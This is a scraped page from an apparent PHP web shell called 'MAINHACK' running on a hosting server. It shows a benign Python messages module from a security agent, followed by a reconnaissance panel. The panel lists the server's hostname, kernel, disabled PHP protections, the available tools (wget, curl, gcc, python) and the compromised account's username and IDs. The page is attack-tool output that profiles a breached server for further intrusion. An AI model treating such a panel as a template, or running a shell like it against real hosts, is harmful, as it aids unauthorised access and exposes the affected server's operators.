[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: messages.py
File is not writable. Editing disabled.
"""Message types exchanged by the agent: incidents, alerts, captcha events,
synclist requests/responses and internal block/unblock notifications."""
from defence360agent import utils
from defence360agent.contracts.messages import (
    Accumulatable,
    Message,
    MessageList,
    Received,
    Reportable,
    ShortenReprListMixin,
)
from im360.contracts.message_pb2 import WebShieldData
from im360.utils.validate import IP

# NOTE(review): other messages in this module use PRIORITY 1 and 2, so a
# smaller number presumably means "handled earlier" -- confirm against the
# code that consumes PRIORITY.
HIGHEST_PRIORITY = 0


class StrategyChange(Message):
    """Emitted when a change of the IDS is detected."""

    DEFAULT_METHOD = 'STRATEGY_CHANGE'
    PRIORITY = HIGHEST_PRIORITY


class SensorIncident(Message):
    """One individual incident (for example, a single failed user auth)."""

    DEFAULT_METHOD = 'INCIDENT'


class SensorIncidentList(MessageList, Reportable):
    """A batch of aggregated incidents."""

    DEFAULT_METHOD = 'INCIDENT_LIST'


class UnreportableLocalIncidentList(MessageList):
    """A batch of local incidents that is not reported to the server."""

    DEFAULT_METHOD = 'LOCALINCIDENT_LIST'


class LocalIncidentList(MessageList, Reportable):
    """A batch of local incidents, i.e. ones where no ip was provided."""

    DEFAULT_METHOD = 'INCIDENT_LIST'


class SensorAlert(Message, Reportable):
    """An alert-level incident (for example, user auth failures reached
    a threshold)."""

    DEFAULT_METHOD = 'ALERT'
    PRIORITY = 1

    @classmethod
    def from_incident(cls, message):
        """Build an ALERT out of an INCIDENT message.

        The incident is copied and the copy's ``'method'`` entry is
        replaced with this class' ``DEFAULT_METHOD``; *message* itself is
        not assigned to.
        """
        alert_fields = message.copy()
        alert_fields['method'] = cls.DEFAULT_METHOD
        return cls(**alert_fields)


class ClientUnblock(Message, Reportable):
    """Message with method ``UNBLOCK``, sent with the highest priority."""

    DEFAULT_METHOD = 'UNBLOCK'
    PRIORITY = HIGHEST_PRIORITY


class CaptchaEventList(ShortenReprListMixin, Message, Reportable):
    """List message used as ``CaptchaEvent.LIST_CLASS``."""

    DEFAULT_METHOD = 'CAPTCHA_LIST'


class CaptchaEvent(Accumulatable):
    """A single captcha event built from a WebShield parcel."""

    DEFAULT_METHOD = 'CAPTCHA'
    LIST_CLASS = CaptchaEventList

    # Event names exposed as class constants.
    FAILED = 'FAILED'
    PASSED = 'PASSED'
    REQUESTED = 'REQUESTED'

    @classmethod
    def from_parcel(cls, parcel):
        """Create an event from *parcel*.

        Returns ``None`` when the parcel's captcha state is
        ``WebShieldData.NA``; otherwise returns an instance whose ``event``
        is the enum name of that captcha state.
        """
        websh = parcel.websh
        if websh.captcha != WebShieldData.NA:
            return cls(
                timestamp=parcel.timestamp,
                attackers_ip=parcel.ip,
                event=WebShieldData.Captcha.Name(websh.captcha),
                user_id=websh.user_id,
                plugin_id='captcha',
            )
        return None


class CaptchaDosAlert(Message):
    """Message with method ``CAPTCHA_DOS_ALERT``."""

    DEFAULT_METHOD = 'CAPTCHA_DOS_ALERT'
    PRIORITY = 1


class SynclistResponse(Message, Received):
    """Received ``SYNCLIST`` message carrying ``blocklist`` and
    ``unblocklist`` mappings."""

    DEFAULT_METHOD = 'SYNCLIST'
    PRIORITY = 2

    @utils.sync.timefun(
        action="SynclistResponse{str->IP.adopt_to_ipvX_network}")
    def __init__(self, *args, **kwargs):
        """Initialise the message and convert the ip keys once.

        The string keys of ``blocklist`` and ``unblocklist`` are converted
        via ``IP.adopt_to_ipvX_network`` here, so the conversion happens a
        single time per processed message.

        :raise ValueError: if a str key cannot be converted to
            IPv4Network / IPv6Network
        """
        super().__init__(*args, **kwargs)
        for list_name in ("blocklist", "unblocklist"):
            converted = {}
            for ip_str, props in self[list_name].items():
                converted[IP.adopt_to_ipvX_network(ip_str)] = props
            # Rebind only after the whole mapping converted successfully.
            self[list_name] = converted

    @staticmethod
    def filter_blocklist(ips: dict, *, action_type: str):
        """Lazily yield the ips of an [un]blocklist that match
        *action_type*.

        An ip matches when it has no properties, when its properties carry
        no ``"action_type"`` key, or when that key equals *action_type*.
        A falsy *ips* (``None`` or empty) yields nothing.
        """
        entries = (ips or {}).items()
        return (
            ip
            for ip, props in entries
            if not props
            or "action_type" not in props
            or props["action_type"] == action_type
        )


class SynclistRequest(Message, Reportable):
    """Reportable message with method ``SYNCLIST``."""

    DEFAULT_METHOD = 'SYNCLIST'


class BlockUnblockList(Message):
    """Internal message for blocking/unblocking ips from lists.

    Expected layout::

        {
            "blocklist": {(IPNetwork, "listname"): {"expiration": int}},
            "unblocklist": [(IPNetwork, "listname")],
        }

    When an ip appears in both lists it is first unblocked and then
    blocked (upsert semantics if applicable).
    """

    DEFAULT_METHOD = "BLOCK_UNBLOCK"
    PRIORITY = HIGHEST_PRIORITY


class ProactiveQueueList(MessageList, Reportable):
    """Reportable list message with method ``PROACTIVE_QUEUE_LIST``."""

    DEFAULT_METHOD = 'PROACTIVE_QUEUE_LIST'


class RuleDisabled(Message, Reportable):
    """A rule was disabled by the customer."""

    DEFAULT_METHOD = 'RULE_DISABLED'


class RuleEnabled(Message, Reportable):
    """A rule was enabled back."""

    DEFAULT_METHOD = 'RULE_ENABLED'


class ConfigSet(Message, Received):
    """Updates to the agent's config."""

    RECEIVED_ACTIONS = ['CONFIG_SET']


class UpdateCustomLists(Message):
    """Tells class RealProtector to update the custom ip white and black
    lists."""

    DEFAULT_METHOD = "UPDATE_CUSTOM_LISTS"


class GroupIPSync(Message, Reportable):
    """Reportable message with method ``GROUP_SYNC``."""

    DEFAULT_METHOD = 'GROUP_SYNC'


class GroupIPSyncPush(Message, Received):
    """Received message with method ``GROUP_SYNC``."""

    DEFAULT_METHOD = 'GROUP_SYNC'


class EnduserPasswordReset(Message, Received):
    """Received message with method ``ENDUSER_PASSWORD_RESET``."""

    DEFAULT_METHOD = "ENDUSER_PASSWORD_RESET"
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.07 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A